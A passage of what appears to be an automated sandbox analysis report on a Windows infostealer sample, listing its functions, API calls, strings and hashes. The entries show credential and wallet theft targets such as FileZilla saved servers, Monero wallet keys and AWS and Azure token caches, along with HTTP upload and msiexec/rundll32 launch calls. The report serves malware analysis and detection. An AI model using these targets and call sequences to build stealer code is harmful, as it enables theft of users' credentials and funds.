                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 1942843190-555421843
                        • Opcode ID: 83af39f618f3e27d353c0bc27aea0265f46fcabc20be875e16368f3737f58d13
                        • Instruction ID: 64528195780005744d6694d6e206ce7f634e2590c54c1727a387e630f22c9405
                        • Opcode Fuzzy Hash: 83af39f618f3e27d353c0bc27aea0265f46fcabc20be875e16368f3737f58d13
                        • Instruction Fuzzy Hash: 74D13175A41109DBDB14EBE4DD99EEE7778EF28310F444418F583A7088DF78AA4ACB60
                        Function 01005960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                          • Part of subcall function 010047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 01004839
                          • Part of subcall function 010047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 01004849
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 010059F8
                        • StrCmpCA.SHLWAPI(?,0189EAC8), ref: 01005A13
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 01005B93
                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0189E978,00000000,?,0189A600,00000000,?,01021A1C), ref: 01005E71
                        • lstrlen.KERNEL32(00000000), ref: 01005E82
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 01005E93
                        • RtlAllocateHeap.NTDLL(00000000), ref: 01005E9A
                        • lstrlen.KERNEL32(00000000), ref: 01005EAF
                        • lstrlen.KERNEL32(00000000), ref: 01005ED8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 01005EF1
                        • lstrlen.KERNEL32(00000000,?,?), ref: 01005F1B
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 01005F2F
                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 01005F4C
                        • InternetCloseHandle.WININET(00000000), ref: 01005FB0
                        • InternetCloseHandle.WININET(00000000), ref: 01005FBD
                        • HttpOpenRequestA.WININET(00000000,0189EA48,?,0189E020,00000000,00000000,00400100,00000000), ref: 01005BF8
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                        • InternetCloseHandle.WININET(00000000), ref: 01005FC7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 874700897-2180234286
                        • Opcode ID: 523dcb686920a5c3b035c55db1aa967b9fe469313876559ab79ebe050675fc8d
                        • Instruction ID: dbd797d2b4835c76f695ce9fbcb98eb7ef272d3a8a01cdc7d5b1a031fa47e24e
                        • Opcode Fuzzy Hash: 523dcb686920a5c3b035c55db1aa967b9fe469313876559ab79ebe050675fc8d
                        • Instruction Fuzzy Hash: F1120A76A21169EBDB15EBA0DC94FEEB378BF24710F404199E54763094EF342A4ACF60
                        Function 0100CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                          • Part of subcall function 01018B60: GetSystemTime.KERNEL32(01020E1A,0189A6C0,010205AE,?,?,010013F9,?,0000001A,01020E1A,00000000,?,01899068,?,\Monero\wallet.keys,01020E17), ref: 01018B86
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0100CF83
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0100D0C7
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0100D0CE
                        • lstrcat.KERNEL32(?,00000000), ref: 0100D208
                        • lstrcat.KERNEL32(?,01021478), ref: 0100D217
                        • lstrcat.KERNEL32(?,00000000), ref: 0100D22A
                        • lstrcat.KERNEL32(?,0102147C), ref: 0100D239
                        • lstrcat.KERNEL32(?,00000000), ref: 0100D24C
                        • lstrcat.KERNEL32(?,01021480), ref: 0100D25B
                        • lstrcat.KERNEL32(?,00000000), ref: 0100D26E
                        • lstrcat.KERNEL32(?,01021484), ref: 0100D27D
                        • lstrcat.KERNEL32(?,00000000), ref: 0100D290
                        • lstrcat.KERNEL32(?,01021488), ref: 0100D29F
                        • lstrcat.KERNEL32(?,00000000), ref: 0100D2B2
                        • lstrcat.KERNEL32(?,0102148C), ref: 0100D2C1
                        • lstrcat.KERNEL32(?,00000000), ref: 0100D2D4
                        • lstrcat.KERNEL32(?,01021490), ref: 0100D2E3
                          • Part of subcall function 0101A820: lstrlen.KERNEL32(01004F05,?,?,01004F05,01020DDE), ref: 0101A82B
                          • Part of subcall function 0101A820: lstrcpy.KERNEL32(01020DDE,00000000), ref: 0101A885
                        • lstrlen.KERNEL32(?), ref: 0100D32A
                        • lstrlen.KERNEL32(?), ref: 0100D339
                          • Part of subcall function 0101AA70: StrCmpCA.SHLWAPI(018992A8,0100A7A7,?,0100A7A7,018992A8), ref: 0101AA8F
                        • DeleteFileA.KERNEL32(00000000), ref: 0100D3B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                        • String ID:
                        • API String ID: 1956182324-0
                        • Opcode ID: c680fb2a18baff771e86ad44d28a027aaaa1bf0f5499aa91693aca84b715747f
                        • Instruction ID: cf69ece2a7ad34bf8ccea476b76a4c70cf266c8da06a204108f0a6010b1d9d4c
                        • Opcode Fuzzy Hash: c680fb2a18baff771e86ad44d28a027aaaa1bf0f5499aa91693aca84b715747f
                        • Instruction Fuzzy Hash: 31E16175A51149EBDB14EBE0ED98EEE7378BF24200F504158F547B7098DF39AA0ACB60
                        Function 0100C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0189D068,00000000,?,0102144C,00000000,?,?), ref: 0100CA6C
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0100CA89
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0100CA95
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0100CAA8
                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0100CAD9
                        • StrStrA.SHLWAPI(?,0189D098,01020B52), ref: 0100CAF7
                        • StrStrA.SHLWAPI(00000000,0189D0B0), ref: 0100CB1E
                        • StrStrA.SHLWAPI(?,0189DCC0,00000000,?,01021458,00000000,?,00000000,00000000,?,018991B8,00000000,?,01021454,00000000,?), ref: 0100CCA2
                        • StrStrA.SHLWAPI(00000000,0189DA20), ref: 0100CCB9
                          • Part of subcall function 0100C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0100C871
                          • Part of subcall function 0100C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0100C87C
                        • StrStrA.SHLWAPI(?,0189DA20,00000000,?,0102145C,00000000,?,00000000,01899138), ref: 0100CD5A
                        • StrStrA.SHLWAPI(00000000,018990C8), ref: 0100CD71
                          • Part of subcall function 0100C820: lstrcat.KERNEL32(?,01020B46), ref: 0100C943
                          • Part of subcall function 0100C820: lstrcat.KERNEL32(?,01020B47), ref: 0100C957
                          • Part of subcall function 0100C820: lstrcat.KERNEL32(?,01020B4E), ref: 0100C978
                        • lstrlen.KERNEL32(00000000), ref: 0100CE44
                        • CloseHandle.KERNEL32(00000000), ref: 0100CE9C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                        • String ID:
                        • API String ID: 3744635739-3916222277
                        • Opcode ID: 557b37390b4b869a4e9061b16e59d4d77b74d861204ba5beac40769fb82b3182
                        • Instruction ID: 2df4ef8cf75281f258c330cc116ad023f7048dbe6fd02a4ced9922e478d863fd
                        • Opcode Fuzzy Hash: 557b37390b4b869a4e9061b16e59d4d77b74d861204ba5beac40769fb82b3182
                        • Instruction Fuzzy Hash: 69E16D76A01149EBDB15EBA0EC94FEEB778AF24300F404159F54767198EF386A4ACF60
                        Function 01018320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                        • RegOpenKeyExA.ADVAPI32(00000000,0189B548,00000000,00020019,00000000,010205B6), ref: 010183A4
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 01018426
                        • wsprintfA.USER32 ref: 01018459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0101847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 0101848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 01018499
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                        • String ID: - $%s\%s$?
                        • API String ID: 3246050789-3278919252
                        • Opcode ID: 3622a5d18f894f103bbd4f80b0adaa1c74e8a3ba7a8b0172b2183ab24db0b130
                        • Instruction ID: d121c90d6419e74338c123af60b3af8ca3e1092406dded52bbb6e49741aed540
                        • Opcode Fuzzy Hash: 3622a5d18f894f103bbd4f80b0adaa1c74e8a3ba7a8b0172b2183ab24db0b130
                        • Instruction Fuzzy Hash: 0C812A75911118EBEB28DB54DD84FEAB7B8FB18310F0086D9E14AA7144DF746B89CFA0
                        Function 01014D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 01018DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 01018E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 01014DB0
                        • lstrcat.KERNEL32(?,\.azure\), ref: 01014DCD
                          • Part of subcall function 01014910: wsprintfA.USER32 ref: 0101492C
                          • Part of subcall function 01014910: FindFirstFileA.KERNEL32(?,?), ref: 01014943
                        • lstrcat.KERNEL32(?,00000000), ref: 01014E3C
                        • lstrcat.KERNEL32(?,\.aws\), ref: 01014E59
                          • Part of subcall function 01014910: StrCmpCA.SHLWAPI(?,01020FDC), ref: 01014971
                          • Part of subcall function 01014910: StrCmpCA.SHLWAPI(?,01020FE0), ref: 01014987
                          • Part of subcall function 01014910: FindNextFileA.KERNEL32(000000FF,?), ref: 01014B7D
                          • Part of subcall function 01014910: FindClose.KERNEL32(000000FF), ref: 01014B92
                        • lstrcat.KERNEL32(?,00000000), ref: 01014EC8
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 01014EE5
                          • Part of subcall function 01014910: wsprintfA.USER32 ref: 010149B0
                          • Part of subcall function 01014910: StrCmpCA.SHLWAPI(?,010208D2), ref: 010149C5
                          • Part of subcall function 01014910: wsprintfA.USER32 ref: 010149E2
                          • Part of subcall function 01014910: PathMatchSpecA.SHLWAPI(?,?), ref: 01014A1E
                          • Part of subcall function 01014910: lstrcat.KERNEL32(?,0189E968), ref: 01014A4A
                          • Part of subcall function 01014910: lstrcat.KERNEL32(?,01020FF8), ref: 01014A5C
                          • Part of subcall function 01014910: lstrcat.KERNEL32(?,?), ref: 01014A70
                          • Part of subcall function 01014910: lstrcat.KERNEL32(?,01020FFC), ref: 01014A82
                          • Part of subcall function 01014910: lstrcat.KERNEL32(?,?), ref: 01014A96
                          • Part of subcall function 01014910: CopyFileA.KERNEL32(?,?,00000001), ref: 01014AAC
                          • Part of subcall function 01014910: DeleteFileA.KERNEL32(?), ref: 01014B31
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 949356159-974132213
                        • Opcode ID: 8a3468e1218835d060d21dd2c75fc4a30d7306d4773179b1728554976aa9cfa5
                        • Instruction ID: b8d9197531f6e80f7f8c99fc0579c760f684e13dd2d7d2bd7d4b8829a531fbff
                        • Opcode Fuzzy Hash: 8a3468e1218835d060d21dd2c75fc4a30d7306d4773179b1728554976aa9cfa5
                        • Instruction Fuzzy Hash: 3A41797AA40219A7D750F770EC86FDD73389B34704F404558B5C55A084EEF997898B92
                        Function 01019010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                        Download Yara Rule
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0101906C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateGlobalStream
                        • String ID: image/jpeg
                        • API String ID: 2244384528-3785015651
                        • Opcode ID: 7db5e11c2454597d1ac7c57dbd37df078c5d64e09fb6d9c568ccd7f3166ff4f6
                        • Instruction ID: b5e385e978d2b794a18f739b23a526ad0adf13e5a9801a0190b007a412891ff5
                        • Opcode Fuzzy Hash: 7db5e11c2454597d1ac7c57dbd37df078c5d64e09fb6d9c568ccd7f3166ff4f6
                        • Instruction Fuzzy Hash: 5571F075950208EBDB14DFE4E898FDEB7B9FF48700F108508F556AB284DB38A905CB60
                        Function 01012E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                        • ShellExecuteEx.SHELL32(0000003C), ref: 010131C5
                        • ShellExecuteEx.SHELL32(0000003C), ref: 0101335D
                        • ShellExecuteEx.SHELL32(0000003C), ref: 010134EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell$lstrcpy
                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                        • API String ID: 2507796910-3625054190
                        • Opcode ID: 7c9fddecd6166be470e62a1dc9d32532d61a89c8ad236c0c3c5eaa80e48f3d5c
                        • Instruction ID: 9f0344c55323d132c384d635bf135b606743c406a7e5898bd4ae8af5dd0c6357
                        • Opcode Fuzzy Hash: 7c9fddecd6166be470e62a1dc9d32532d61a89c8ad236c0c3c5eaa80e48f3d5c
                        • Instruction Fuzzy Hash: 37121D71901149DADB19FBA0DD91FEEB738AF24310F504159E58667198EF382B8ECFA0
                        Function 010152C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                          • Part of subcall function 01006280: InternetOpenA.WININET(01020DFE,00000001,00000000,00000000,00000000), ref: 010062E1
                          • Part of subcall function 01006280: StrCmpCA.SHLWAPI(?,0189EAC8), ref: 01006303
                          • Part of subcall function 01006280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 01006335
